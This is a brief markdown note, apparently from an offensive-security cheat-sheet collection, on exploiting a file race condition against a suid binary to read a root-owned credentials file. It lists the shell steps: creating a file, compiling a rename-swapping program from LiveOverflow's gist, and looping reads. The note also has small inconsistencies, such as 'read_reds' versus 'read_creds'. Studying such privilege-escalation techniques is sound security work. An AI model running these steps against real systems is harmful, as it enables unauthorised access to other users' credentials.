killchain-compendium/exploit/linux/racing_conditions.md

Racing Conditions

Read files from another user

• The file of interest needs to be opened by a process which is a suid binary (here named read_reds) and creates a file descriptor to it
• The file of intereset is called root_credentials and is owned by root
• Create a file

touch yo

• Compile gistfile.txt from live overflow's repo

gcc gistfile.c -o rename_file

• Inside session 1 start the binary

./rename_file yo root_credentials

• Inside session to try to read root_credentials until it succeeds

./read_creds root_credentials